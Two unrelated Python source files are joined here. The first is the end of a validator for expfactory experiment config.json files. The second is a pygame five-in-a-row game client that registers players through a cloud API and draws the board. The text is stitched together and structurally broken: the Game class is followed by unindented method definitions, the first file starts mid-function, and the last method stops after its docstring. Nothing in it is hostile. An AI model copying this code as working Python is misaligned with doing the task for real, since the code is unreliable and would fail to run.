            # Field value must have minimum of value entries
            if not isinstance(meta[0][field],list):
                tocheck = [meta[0][field]]
            else:
                tocheck = meta[0][field]
            if len(tocheck) < value:
                return notvalid("%s: config.json must have >= %s for field %s" %(experiment_name,value,field))
        # Below is for warning parameters
        elif value == 2:
            if meta[0][field] == "":
                if warning == True:
                    dowarning("WARNING: config.json is missing value for field %s: %s" %(field,experiment_name))
        # Check the experiment template, currently valid are jspsych and survey
        if field == "template":
            if meta[0][field] not in valid_templates:
                return notvalid("%s: we currently only support %s experiments." %(experiment_name,",".join(valid_templates)))
            # Jspsych javascript experiment
            if meta[0][field] == "jspsych":
                if "run" in meta[0]:
                    if "experiment.js" not in meta[0]["run"]:
                        return notvalid("%s: experiment.js is not defined in run" %(experiment_name))
                else:
                    return notvalid("%s: config.json is missing required field run" %(experiment_name))
            # Material Design light survey
            elif meta[0][field] == "survey":
                if not os.path.exists("%s/survey.tsv" %(experiment_folder)):
                    return notvalid("%s: required survey.tsv for template survey not found." %(experiment_name))
            # Phaser game
            elif meta[0][field] == "phaser":
                if not os.path.exists("%s/Run.js" %(experiment_folder)):
                    return notvalid("%s: required Run.js main game file not found." %(experiment_name))
                if "run" not in meta[0]["deployment_variables"]:
                    return notvalid("%s: 'run' (code) is required in deployment_variables" %(experiment_name))
        # Validation for deployment_variables
        # NOTE(review): the return value of check_acceptable_variables is
        # discarded, so these checks are advisory (print-only).
        if field == "deployment_variables":
            if "deployment_variables" in meta[0]:
                if "jspsych_init" in meta[0][field]:
                    check_acceptable_variables(experiment_name,meta[0][field],"jspsych","jspsych_init")
                elif "survey" in meta[0][field]:
                    check_acceptable_variables(experiment_name,meta[0][field],"survey","material_design")
    return True
def check_acceptable_variables(experiment_name,field_dict,template,field_dict_key):
    '''check_acceptable_variables takes a field (eg, meta[0][field]) that has a dictionary, and some template key (eg, jspsych) and makes sure the keys of the dictionary are within the allowable for the template type (the key).

    :param experiment_name: the name of the experiment
    :param field_dict: the field value from the config.json, a dictionary
    :param template: the key name, for looking up acceptable values using get_acceptable_values
    :param field_dict_key: a key to look up in the field_dict, which should contain a dictionary of {"key":"value"} variables
    :returns: False (via notvalid) on the first unacceptable variable or
              non-numeric numeric variable, otherwise None

    Fix: iterate with .items() rather than the Python-2-only
    .iteritems(); behavior is identical under Python 2. The docstring
    parameter order now matches the signature.
    NOTE(review): results of check_boolean are discarded here (as in the
    caller), so invalid booleans only print — confirm before tightening.
    '''
    acceptable_values = get_acceptable_values(template)
    for acceptable_var, acceptable_val in field_dict[field_dict_key].items():
        if acceptable_var not in acceptable_values:
            return notvalid("%s: %s is not an acceptable value for %s." %(experiment_name,acceptable_var,field_dict_key))
        # Jspsych specific validation
        if template == "jspsych":
            # Variables that must be boolean
            if acceptable_var in ["show_progress_bar","fullscreen","skip_load_check"]:
                check_boolean(experiment_name,acceptable_val,acceptable_var)
            # Variables that must be numeric
            if acceptable_var in ["default_iti","max_load_time"]:
                if isinstance(acceptable_val,str) or isinstance(acceptable_val,bool):
                    return notvalid("%s: %s is not an acceptable value for %s in %s. Must be numeric." %(experiment_name,acceptable_val,acceptable_var,field_dict_key))
        elif template == "survey":
            # Variables that must be boolean
            if acceptable_var in ["show_progress_bar","fullscreen","skip_load_check"]:
                check_boolean(experiment_name,acceptable_val,acceptable_var)
def check_boolean(experiment_name,value,variable_name):
    '''check_boolean checks if a value is boolean; returns None when the value
    is acceptable, otherwise delegates to notvalid (which reports the error).
    :param experiment_name: the name of the experiment
    :param value: the value to check
    :param variable_name: the name of the variable (the key being indexed in the dictionary)
    '''
    if value not in [True,False]:
        # BUG FIX: the error branch referenced a misspelled `varialbe_name`,
        # raising NameError instead of reporting the invalid value.
        return notvalid("%s: %s is not an acceptable value for %s. Must be true/false." %(experiment_name,value,variable_name))
def get_experiments(experiment_repo,load=False,warning=True,repo_type="experiments"):
    '''get_experiments
    return loaded json for all valid experiments from an experiment folder
    :param experiment_repo: full path to the experiments repo
    :param load: if True, returns a list of loaded config.json objects. If False (default) returns the paths to the experiments
    :param warning: passed through to validate() to control warning output (default True)
    :param repo_type: tells the user what kind of task is being parsed, default is "experiments," but can also be "surveys" when called by get_surveys
    :returns: list of valid experiment paths, or of loaded configs when load is True
    '''
    experiments = find_directories(experiment_repo)
    valid_experiments = [e for e in experiments if validate(e,warning)]
    # Parenthesized print works under both Python 2 and Python 3.
    print("Found %s valid %s" %(len(valid_experiments),repo_type))
    if load == True:
        valid_experiments = load_experiments(valid_experiments)
    return valid_experiments
def load_experiments(experiment_folders):
    '''load_experiments
    a wrapper for load_experiment to read multiple experiments
    :param experiment_folders: a list of experiment folders to load, full paths (a single path string is also accepted)
    :returns: list of loaded experiment configs, in input order
    '''
    # Accept a bare path string by promoting it to a one-element list.
    if isinstance(experiment_folders,str):
        experiment_folders = [experiment_folders]
    return [load_experiment(folder) for folder in experiment_folders]
def load_experiment(experiment_folder):
    '''load_experiment:
    reads in the config.json for an experiment folder
    :param experiment_folder: full path to experiment folder
    :returns: single-element list wrapping the de-unicoded config dict, or the
              notvalid(...) result when config.json is missing
    :raises ValueError: re-raised when config.json is not valid JSON
    '''
    fullpath = os.path.abspath(experiment_folder)
    configjson = "%s/config.json" %(fullpath)
    if not os.path.exists(configjson):
        return notvalid("config.json could not be found in %s" %(experiment_folder))
    try:
        # BUG FIX: the file handle from open() was never closed; use a
        # context manager so it is released even on parse errors.
        with open(configjson,"r") as config_file:
            meta = json.load(config_file)
        meta = remove_unicode_dict(meta[0])
        return [meta]
    except ValueError as e:
        print("Problem reading config.json, %s" %(e))
        raise
def find_changed(new_repo,comparison_repo,return_experiments=True,repo_type="experiments"):
    '''find_changed returns a list of changed files or experiments between two repos
    :param new_repo: the updated repo - any new files, or changed files, will be returned
    :param comparison_repo: the old repo to compare against. A file changed or missing in this repo in the new_repo indicates it should be tested
    :param return_experiments: return experiment folders. Default is True. If False, will return complete file list
    :param repo_type: repo flavor ("experiments" or "surveys"); also used to
                      map file paths under $HOME/expfactory-<repo_type> onto
                      their counterparts in comparison_repo
    '''
    # First find all experiment folders in current repo
    experiment_folders = get_experiments(new_repo,load=False,warning=False,repo_type=repo_type)
    # Collect every file below every valid experiment folder.
    file_list = []
    for experiment_folder in experiment_folders:
        for root, dirnames, filenames in os.walk(experiment_folder):
            for filename in filenames:
                file_list.append(os.path.join(root, filename))
    # Compare against master: a file is "changed" when its counterpart in the
    # old repo differs, or when no counterpart exists (newly added file).
    changed_files = []
    for contender_file in file_list:
        old_file = contender_file.replace("%s/expfactory-%s" %(os.environ["HOME"],repo_type),comparison_repo)
        # If the old file exists, check if it's changed
        if os.path.exists(old_file):
            if not filecmp.cmp(old_file,contender_file):
                changed_files.append(contender_file)
        # If it doesn't exist, it is new and therefore changed.
        else:
            changed_files.append(contender_file)
    # Parenthesized print works under both Python 2 and Python 3.
    print("Found files changed: %s" %(",".join(changed_files)))
    if return_experiments == True:
        # Collapse the file list to the unique parent (experiment) folders.
        return numpy.unique([os.path.dirname(x.strip("\n")) for x in changed_files if os.path.dirname(x.strip("\n")) != ""]).tolist()
    return changed_files
def make_lookup(experiment_list,key_field):
    '''make_lookup
    returns dict object to quickly look up query experiment on exp_id
    :param experiment_list: a list of query (dict objects); each entry is a
        single-element list wrapping the experiment dict
    :param key_field: the key in the dictionary to base the lookup key (str)
    :returns lookup: dict (json) with key as "key_field" from query_list
    '''
    # Later entries with a duplicate key overwrite earlier ones, exactly as
    # the equivalent assignment loop would.
    return dict((entry[0][key_field], entry[0]) for entry in experiment_list)
| |
#!/usr/bin/env python
"""This program is a five in row game, which is used for the coding
camp 2015 in WindRiver.com"""
import os
import sys, getopt
import pygame as pg
import threading
import json
from toolbox import button
from toolbox import tools
# Cloud API
from CloudAPI.node import Node
from CloudAPI.config import *
# RGB color constants used across the UI.
#                 R    G    B
GRAY     = (100, 100, 100)
WHITE    = (255, 255, 255)
RED      = (255,   0,   0)
GREEN    = (  0, 255,   0)
BLUE     = (  0,   0, 255)
YELLOW   = (255, 255,   0)
ORANGE   = (255, 128,   0)
PURPLE   = (255,   0, 255)
CYAN     = (  0, 255, 255)
BLACK    = (  0,   0,   0)
BRIGHT_GREEN = (  0, 255,   0)
BRIGHT_RED   = (255,   0,   0)
NAVYBLUE     = ( 60,  60, 100)
# Move/game status codes exchanged with the cloud service
# (read from the 'Status' field of each move record).
DRAW = 0
CONTINUE = 1
WIN = 2
ERROR = 3
# Name of the cloud backend; used to index cloud_configs in init_for_cloud.
cloud_service = "Mashery"
def usage():
    """Print command-line usage for this program to stdout."""
    prog = os.path.basename(__file__)
    USAGE = """\
Usage: %s <-i config_file> [options]
-i, --ifile= Input the config file, which contains player user name,
screen width and hight, and input method, etc.
Options:
-h, --help Show this message
-g, --gameid= Enter into watching mode and watch the game of [gameid]
Examples:
%s -i config.json_pc
%s -i config.json_touch
%s -i config.json_watch -g 1
"""
    # The template references the program name four times.
    print (USAGE % ((prog,) * 4))
if __name__ == "__main__":
    # --- Command-line parsing -------------------------------------------
    # -i/--ifile is required (JSON config file); -g/--gameid switches the
    # client into watching mode for a given (or the latest) game.
    inputfile = ''
    watch_mode = 0   # 1 = watch an existing game instead of playing
    watch_game = -1  # game id to watch; -1 means "use the latest game"
    try:
        opts, args = getopt.getopt(sys.argv[1:],"hi:g:",["help","ifile=", "gameid="])
    except getopt.GetoptError as err:
        print str(err)
        usage()
        sys.exit(2)
    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit()
        elif opt in ("-i", "--ifile="):
            inputfile = arg
        elif opt in ("-g", "--gameid="):
            watch_mode = 1
            try:
                watch_game = int(arg)
            except:
                # Non-numeric game id: fall back to latest game (-1).
                print "Find latest game to watch", arg
    if inputfile == '':
        usage()
        sys.exit(2)
    else:
        if not os.path.isfile(inputfile):
            print "The file of input doesn't exit"
            sys.exit(2)
    # Sample of the expected config schema (kept for reference):
    #config = {'CHESS BOARD BLOCK COUNTS': 10, 'SCREEN WIDTH': 320, 'SCREEN HIGHT': 240,
    #          'USER NAME': 'Charles', 'TOUCH SCREEN': True,
    #          'CLOUD_SERVICE': 'Mashery',
    #          'BOARD MARGIN LEFT': 15, 'BOARD MARGIN TOP': 15, 'CHESS RADIUS': 10,
    #          'CLIENT ROLE': 1 # (BLACK) First Start
    #          }
    #with open('config.json', 'w') as f:
    #    json.dump(config, f)
    #exit()
    #with open('config.json', 'r') as f:
    # Load the JSON config and expose its values as module-level settings
    # read by the Game class below.
    with open(inputfile, 'r') as f:
        config = json.load(f)
    print "config:", config
    CHESS_BOARD_BLOCK_COUNTS = config['CHESS BOARD BLOCK COUNTS']  # grid cells per side
    SCREEN_WIDTH = config['SCREEN WIDTH']
    SCREEN_HIGHT = config['SCREEN HIGHT']
    TOUCH_SCREEN = config['TOUCH SCREEN']  # True = small touch-screen layout
    BOARD_MARGIN_LEFT = config['BOARD MARGIN LEFT']
    BOARD_MARGIN_TOP = config['BOARD MARGIN TOP']
    CHESS_RADIUS = config['CHESS RADIUS']
    USER_NAME = config['USER NAME']
    SHOW_MOUSEMOTION = False
    KEYBOARD_INPUT = config['KEYBOARD INPUT']
    USER_NAME_TEXT_COLOR = config['USER NAME TEXT COLOR']
    BOARD_GRID_LINE_COLOR = config['BOARD GRID LINE COLOR']
class Game(tools.States):
def __init__(self):
    """Set up pygame, register with the cloud service (or enter watching
    mode), build the board UI, and start the background move-reader thread.
    Reads the module-level config settings (SCREEN_WIDTH, TOUCH_SCREEN, ...)
    and the watch_mode/watch_game globals parsed from the command line."""
    #if TOUCH_SCREEN == True:
    #os.putenv('SDL_MOUSEDEV' , '/dev/input/event2')
    pg.init()
    if TOUCH_SCREEN == True:
        pg.mouse.set_visible(0)
    self.done = False
    self.scr = pg.display.set_mode((SCREEN_WIDTH,SCREEN_HIGHT))
    # "Connecting" splash while cloud registration happens below.
    if TOUCH_SCREEN == True:
        waiting_font_size = 12
    else:
        waiting_font_size = 20
    text = "Connecting cloud server ..."
    self.waiting_text, self.waiting_rect = self.make_text(text, GREEN,
                                                          (SCREEN_WIDTH // 2 ,
                                                           SCREEN_HIGHT // 2), waiting_font_size)
    self.scr.blit(self.waiting_text, self.waiting_rect)
    pg.display.update()
    # 1 Register and start game: obtain game ID and client role.
    # role_id: '0' = host (black, moves first), '1' = guest, '2' = watcher.
    self.debug = True
    #self.role_id = '0' # Host as default
    self.seq_id = 0
    self.init_for_cloud()
    if watch_mode >0:
        self.role_id = "2"
        if watch_game >= 0:
            self.game_id = str(watch_game)
        else:
            # No explicit id: find the latest game on the cloud.
            self.game_id = str(self.findlatest_game())
    else:
        r = self.client_register()
        if not r:
            print("fails to first player register")
        else:
            r = json.loads(r)
            #print "### r", r
            #print("First player register: role id %s, game id %s" % (r["roleId"], r["gameId"]))
            self.game_id = r["gameId"]
            self.role_id = r["roleId"]
    self.clock = pg.time.Clock()
    # 2 Load board/chess images and derive pixel geometry from the config.
    self.board = pg.image.load('resources/images/Board.png')
    self.black = pg.image.load('resources/images/Black.png')
    self.white = pg.image.load('resources/images/White.png')
    self.scr = pg.display.set_mode((SCREEN_WIDTH,SCREEN_HIGHT))
    self.board_margin_left = BOARD_MARGIN_LEFT
    self.board_margin_top = BOARD_MARGIN_TOP
    self.chess_radius = CHESS_RADIUS
    # The board graphic occupies 833/1000 of the screen width.
    self.block_width = ((SCREEN_WIDTH * 833 // 1000) - self.board_margin_left * 2) // ( CHESS_BOARD_BLOCK_COUNTS + 1 )
    self.block_hight = self.block_width
    self.shrinkx = SCREEN_WIDTH
    self.shrinky = SCREEN_HIGHT
    self.black_image = pg.transform.smoothscale(self.black, (self.chess_radius * 2 , self.chess_radius * 2))
    self.white_image = pg.transform.smoothscale(self.white, (self.chess_radius * 2 , self.chess_radius * 2))
    tools.States.__init__(self)
    self.won_game = False
    self.screen_rect = self.scr.get_rect()
    self.overlay = pg.Surface((self.screen_rect.width, self.screen_rect.height))
    self.overlay.fill(0)
    self.overlay.set_alpha(0)
    self.X = 0
    self.Y = 0
    # last_put_X/Y track where the red focus marker was last drawn so it
    # can be erased; start values differ by screen type.
    if TOUCH_SCREEN == True:
        self.last_put_X = 8
        self.last_put_Y = 8
    else:
        self.last_put_X = 16
        self.last_put_Y = 16
    # 3 Show Board
    #self.board_width = 833
    #self.bg_width = 1000
    #self.block_width = (self.shrinkx * (self.board_width / self.bg_width) - self.board_margin_left * 2) / 15 - 1
    self.board_image = pg.transform.smoothscale(self.board, (self.shrinkx, self.shrinky))
    self.scr.blit(self.board_image, (0,0))
    if TOUCH_SCREEN == True:
        self.grid_width = 1
    else:
        self.grid_width = 2
    self.draw_grid(CHESS_BOARD_BLOCK_COUNTS)
    pg.display.flip()
    self.setup_btns()
    # x coordinate where the side panel (names/buttons) begins.
    self.right_board_x = CHESS_BOARD_BLOCK_COUNTS*self.block_width+self.board_margin_left * 2
    # TODO (enabling quit in thread)
    # Get player 2 user name (blocking)
    self.competitor_name = self.get_competitor_name(self.game_id,self.role_id)
    self.draw_user_info()
    # Init chess focus at the board center.
    self.cur_x = CHESS_BOARD_BLOCK_COUNTS // 2
    self.cur_y = self.cur_x
    if self.role_id == '0':
        self.set_last_chess_prompt(self.cur_x,self.cur_y)
    # Park the "last put" marker off-board so nothing is erased yet.
    # NOTE(review): these two assignments may originally have been nested
    # under the role_id == '0' branch — indentation was ambiguous; confirm.
    self.last_put_X = CHESS_BOARD_BLOCK_COUNTS + 10 #not exits
    self.last_put_Y = CHESS_BOARD_BLOCK_COUNTS + 10
    pg.display.update()
    # Board state: 0 = empty, 1/2 = stones (see events()).
    self.grid = [[0 for x in range(CHESS_BOARD_BLOCK_COUNTS + 1)] for y in range(CHESS_BOARD_BLOCK_COUNTS + 1)]
    ### Your turn: Put down the first chess at the center of the board
    if self.role_id == '0':
        self.your_turn = True
    else:
        self.your_turn = False
    # WATCHING MODE: replay history, then (if the game is still running)
    # keep polling the cloud for new moves on a background thread.
    self.fetch_data = True
    if self.role_id == "2":
        self.get_history_from_cloud()
    if self.fetch_data == True:
        self.T = threading.Thread(target=self.read_from_cloud)
        self.T.start()
def draw_user_info(self):
    """Draw both players' chess icons and names in the side panel to the
    right of the board: competitor in row 1, local player in row 5.
    The icon color depends on role_id ('1' plays white, otherwise black)."""
    # Smaller font on touch screens.
    if TOUCH_SCREEN == True:
        name_font_size = 12
    else:
        name_font_size = 20
    # Competitor chess icon, centered horizontally in the side panel.
    x1 = self.right_board_x + (SCREEN_WIDTH - self.right_board_x)/2 - self.chess_radius
    pg.display.update(self.scr.blit(self.black_image if self.role_id == '1' else self.white_image,
                                    (x1,
                                     1*self.block_hight + self.board_margin_top)))
    # Competitor name text just above the icon.
    x1 = self.right_board_x + (SCREEN_WIDTH - self.right_board_x)/2
    text = self.competitor_name
    self.guest_text, self.guest_rect = self.make_text(text, USER_NAME_TEXT_COLOR,
                                                      (x1,
                                                       1*self.block_hight + self.board_margin_top - self.chess_radius), name_font_size)
    # Your chess icon (opposite color of the competitor's).
    x1 = self.right_board_x + (SCREEN_WIDTH - self.right_board_x)/2 - self.chess_radius
    pg.display.update(self.scr.blit(self.white_image if self.role_id == '1' else self.black_image,
                                    (x1,
                                     5*self.block_hight + self.board_margin_top)))
    # Your name text just above your icon.
    text = self.user_name
    x1 = self.right_board_x + (SCREEN_WIDTH - self.right_board_x)/2
    self.host_text, self.host_rect = self.make_text(text, USER_NAME_TEXT_COLOR,
                                                    (x1,
                                                     5*self.block_hight + self.board_margin_top - self.chess_radius), name_font_size)
def set_dataitem(self,node, data_name, data_val):
    """JSON-encode data_val and store it on the cloud node under data_name.
    Returns True on success, False when the cloud write fails."""
    data_id = node.dataId(data_name)
    if self.debug:
        print("setting data item %s = %s" % (data_id, str(data_val)))
    if node.setData(data_id, json.dumps(data_val)):
        return True
    print("Fail to set data item %s = %s" % (data_id, data_val))
    return False
def get_dataitem(self, node, data_id):
    """Fetch a raw data item from the cloud node.
    Returns the value, or None (after logging) when the query fails."""
    val = node.getData(data_id)
    if val:
        if self.debug:
            print("fetch data item %s = %s" % (data_id, str(val)))
        return val
    print("Fail to query data item %s" % data_id)
    return None
def __update_role_id(self):
    # Toggle role_id between 0 and 1 and return the previous value.
    # NOTE(review): this does integer arithmetic on role_id, but everywhere
    # else in the class role_id is a string ('0'/'1'/'2'), so calling this
    # would raise TypeError. Looks like dead/legacy code — confirm before use.
    r = self.role_id
    self.role_id += 1
    self.role_id &= 1
    if self.debug:
        print("assign new role id %d" % r)
    return r
def init_for_cloud(self):
    # Create the cloud Node for the backend named by the module-level
    # `cloud_service`, using its entry in CloudAPI's cloud_configs.
    self.node = Node(cloud_service, cloud_configs[cloud_service])
def client_register(self):
    """Register this player with the cloud 'vlvRegistration' script.
    Returns the raw response (a JSON string with roleId/gameId on success),
    or a falsy value when registration fails."""
    payload = {
        "registration": json.dumps({
            "playerName": USER_NAME,
        })
    }
    return self.node.cloud.scripto().execute('vlvRegistration', payload)
def draw_grid(self, n):
    """Draw the (n+1) x (n+1) line grid onto the board surface, plus the
    four reference ("star") dots two cells in from each corner."""
    left = self.board_margin_left
    top = self.board_margin_top
    step = self.block_width
    span = n * step
    for i in range(0, n + 1):
        offset = i * step
        # Horizontal line for row i.
        pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR,
                     (left, top + offset), (left + span, top + offset), self.grid_width)
        # Vertical line for column i.
        pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR,
                     (left + offset, top), (left + offset, top + span), self.grid_width)
    # Reference points: smaller dots on touch screens.
    if TOUCH_SCREEN == True:
        radius = 3
    else:
        radius = 6
    # Filled circles at the four 2-in corner intersections.
    for gx in (2, n - 2):
        for gy in (2, n - 2):
            pg.draw.circle(self.scr, BOARD_GRID_LINE_COLOR,
                           (left + gx * step, top + gy * step), radius, 0)
def patch_grid(self, n, x, y):
    """Repaint the grid-line fragments under an erased chess at grid
    position (x, y), covering edge, border and interior cases."""
    for repaint in (self.patch_grid_x0_xn,
                    self.patch_grid_y0_yn,
                    self.patch_grid_inner):
        repaint(n, x, y)
def patch_grid_x0_xn(self, n, x, y):
    """Repair grid-line stubs under an erased chess that sits on the left
    (x == 0) or right (x == n) board edge, including the four corners.
    Stubs are chess_radius long and clipped so they never cross the border.

    :param n: number of blocks per board side
    :param x: grid column of the erased chess
    :param y: grid row of the erased chess
    """
    if x == 0:
        x1 = self.board_margin_left
        if y == 0:
            # Top-left corner: stubs extend right and down only.
            y1 = self.board_margin_top
            # Rows
            x2 = self.board_margin_left + self.chess_radius
            y2 = self.board_margin_top
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
            # Columns
            x2 = self.board_margin_left
            y2 = self.board_margin_top + self.chess_radius
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
        elif y == n:
            # Bottom-left corner: stubs extend right and up only.
            # Rows
            y1 = self.board_margin_top + (y * self.block_width)
            x2 = self.board_margin_left + self.chess_radius
            y2 = self.board_margin_top + (y * self.block_width)
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
            # Columns
            y1 = self.board_margin_top + (y * self.block_width - self.chess_radius)
            x2 = self.board_margin_left
            y2 = self.board_margin_top + (y * self.block_width)
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
        else:
            # Left edge, interior row: horizontal stub right, vertical both ways.
            # Rows
            y1 = self.board_margin_top + (y * self.block_width)
            x2 = self.board_margin_left + self.chess_radius
            y2 = self.board_margin_top + (y * self.block_width)
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
            # Columns
            y1 = self.board_margin_top + (y * self.block_width - self.chess_radius)
            x2 = self.board_margin_left
            y2 = self.board_margin_top + (y * self.block_width + self.chess_radius)
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
    elif x == n:
        x1 = self.board_margin_left + (x * self.block_width)
        if y == 0:
            # Top-right corner: stubs extend left and down only.
            # BUG FIX: y1 was never assigned in this branch, raising
            # NameError when patching the top-right corner; by symmetry
            # with the top-left corner it must be the top margin.
            y1 = self.board_margin_top
            # Rows
            x2 = self.board_margin_left + (x * self.block_width) - self.chess_radius
            y2 = self.board_margin_top
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
            # Columns
            x2 = self.board_margin_left + (x * self.block_width)
            y2 = self.board_margin_top + self.chess_radius
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
        elif y == n:
            # Bottom-right corner: stubs extend left and up only.
            # Rows
            y1 = self.board_margin_top + (y * self.block_width)
            x2 = self.board_margin_left + (x * self.block_width) - self.chess_radius
            y2 = self.board_margin_top + (y * self.block_width)
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
            # Columns
            y1 = self.board_margin_top + (y * self.block_width - self.chess_radius)
            x2 = self.board_margin_left + (x * self.block_width)
            y2 = self.board_margin_top + (y * self.block_width)
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
        else:
            # Right edge, interior row: horizontal stub left, vertical both ways.
            # Rows
            y1 = self.board_margin_top + (y * self.block_width)
            x2 = self.board_margin_left + (x * self.block_width) - self.chess_radius
            y2 = self.board_margin_top + (y * self.block_width)
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
            # Columns
            y1 = self.board_margin_top + (y * self.block_width - self.chess_radius)
            x2 = self.board_margin_left + (x * self.block_width)
            y2 = self.board_margin_top + (y * self.block_width + self.chess_radius)
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
def patch_grid_y0_yn(self, n, x, y):
    """Repair grid-line stubs under an erased chess on the top (y == 0) or
    bottom (y == n) board edge, excluding the corners (those are handled
    by patch_grid_x0_xn).

    :param n: number of blocks per board side
    :param x: grid column of the erased chess
    :param y: grid row of the erased chess
    """
    if y == 0:
        if not x == 0 and not x == n:
            # Top edge, interior column: horizontal stub both ways,
            # vertical stub downward only.
            y1 = self.board_margin_top
            x1 = self.board_margin_left + (x * self.block_width) - self.chess_radius
            # Rows
            x2 = self.board_margin_left + (x * self.block_width) + self.chess_radius
            y2 = self.board_margin_top
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
            # Columns
            x1 = self.board_margin_left + (x * self.block_width)
            x2 = self.board_margin_left + (x * self.block_width)
            y2 = self.board_margin_top + self.chess_radius
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
    elif y == n:
        if not x == 0 and not x == n:
            # Bottom edge, interior column: horizontal stub both ways,
            # vertical stub upward only.
            y1 = self.board_margin_top + (y * self.block_width)
            x1 = self.board_margin_left + (x * self.block_width) - self.chess_radius
            # Rows
            x2 = self.board_margin_left + (x * self.block_width) + self.chess_radius
            y2 = y1
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
            # Columns
            x1 = self.board_margin_left + (x * self.block_width)
            x2 = x1
            y2 = y1 - self.chess_radius
            pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (x1,y1), (x2,y2), self.grid_width)
def patch_grid_inner(self, n, x, y):
    """For an interior intersection (not on any board edge), redraw the
    short horizontal and vertical grid stubs under an erased chess."""
    if 0 < x < n and 0 < y < n:
        cx = self.board_margin_left + (x * self.block_width)
        cy = self.board_margin_top + (y * self.block_width)
        r = self.chess_radius
        # Horizontal stub through the intersection.
        pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (cx - r, cy), (cx + r, cy), self.grid_width)
        # Vertical stub through the intersection.
        pg.draw.line(self.scr, BOARD_GRID_LINE_COLOR, (cx, cy - r), (cx, cy + r), self.grid_width)
def init_client_conn_socket(self):
    """Connect to a peer game server over TCP (127.0.0.1:50007), retrying
    on refusal and pumping pygame events so the window can still be quit.
    On success, stores the connected socket in self.soc / self.conn."""
    # BUG FIX: the `socket` module is never imported at module level in
    # this file, so this method raised NameError when called. Import it
    # locally to keep the fix self-contained.
    import socket
    self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    self.soc.settimeout(5.0)
    retry_hosts = True  # outer flag used to break out of the nested loops
    while retry_hosts:
        #ip = entry('host ip : <15,15>',width = 280)
        ip = ["127.0.0.1"]
        if not ip or not ip[0]:
            print('exit')
            exit()
        while True:
            try:
                print('try to connect...')
                self.soc.connect((ip[0],50007))
                retry_hosts = False
                print('connected')
                break
            except socket.timeout:
                print('good ip ... ?')
                break
            except socket.error:
                print('...refused')
                pg.time.wait(1000)
            # Keep the UI responsive between retries: honor window close.
            for ev in pg.event.get():
                if ev.type == pg.QUIT:
                    print('exit game')
                    exit()
    self.conn = self.soc
    self.soc.settimeout(None)
def set_last_chess_prompt(self, x, y):
    """Draw the red focus marker (four L-shaped corner brackets) around
    board position (x, y), then erase the marker from its previous
    position. Out-of-range coordinates are ignored."""
    print "set_last_chess_prompt (", "x:", x, "y:", y, ")"
    if x <= CHESS_BOARD_BLOCK_COUNTS and y <= CHESS_BOARD_BLOCK_COUNTS and x >= 0 and y >= 0:
        self.cur_x = x
        self.cur_y = y
        # Each bracket is two thin red rectangles (a horizontal and a
        # vertical 8x2 / 2x8 strip) just outside the chess radius.
        # left top: -
        pg.display.update(self.scr.fill(pg.Color('red'),
                          (x*self.block_width + self.board_margin_left - self.chess_radius - 1,
                           y*self.block_hight + self.board_margin_top - self.chess_radius - 1,8,2)))
        # |
        pg.display.update(self.scr.fill(pg.Color('red'),
                          (x*self.block_width + self.board_margin_left - self.chess_radius - 1,
                           y*self.block_hight + self.board_margin_top - self.chess_radius - 1,2,8)))
        # right down
        pg.display.update(self.scr.fill(pg.Color('red'),
                          (x*self.block_width + self.board_margin_left + self.chess_radius + 1 - 2,
                           y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 8,2,8)))
        # -
        pg.display.update(self.scr.fill(pg.Color('red'),
                          (x*self.block_width + self.board_margin_left + self.chess_radius + 1 - 8,
                           y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 2,8,2)))
        # ----------------------------------------------------
        # left down
        # -
        pg.display.update(self.scr.fill(pg.Color('red'),
                          (x*self.block_width + self.board_margin_left - self.chess_radius - 1,
                           y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 2, 8,2)))
        # |
        pg.display.update(self.scr.fill(pg.Color('red'),
                          (x*self.block_width + self.board_margin_left - self.chess_radius - 1,
                           y*self.block_hight + self.board_margin_top + self.chess_radius + 1 - 8, 2,8)))
        # right top
        # -
        pg.display.update(self.scr.fill(pg.Color('red'),
                          (x*self.block_width + self.board_margin_left + self.chess_radius + 1 - 8,
                           y*self.block_hight + self.board_margin_top - self.chess_radius - 1,8,2)))
        # |
        pg.display.update(self.scr.fill(pg.Color('red'),
                          (x*self.block_width + self.board_margin_left + self.chess_radius + 1 - 2,
                           y*self.block_hight + self.board_margin_top - self.chess_radius - 1,2,8)))
        # Erase the marker at the previous (last_put_X, last_put_Y) spot.
        self.clear_last_chess_prompt()
def clear_last_chess_prompt(self):
    """Erase the red focus marker previously drawn at
    (last_put_X, last_put_Y) by re-blitting the matching board-image
    rectangles over each of the eight marker strips."""
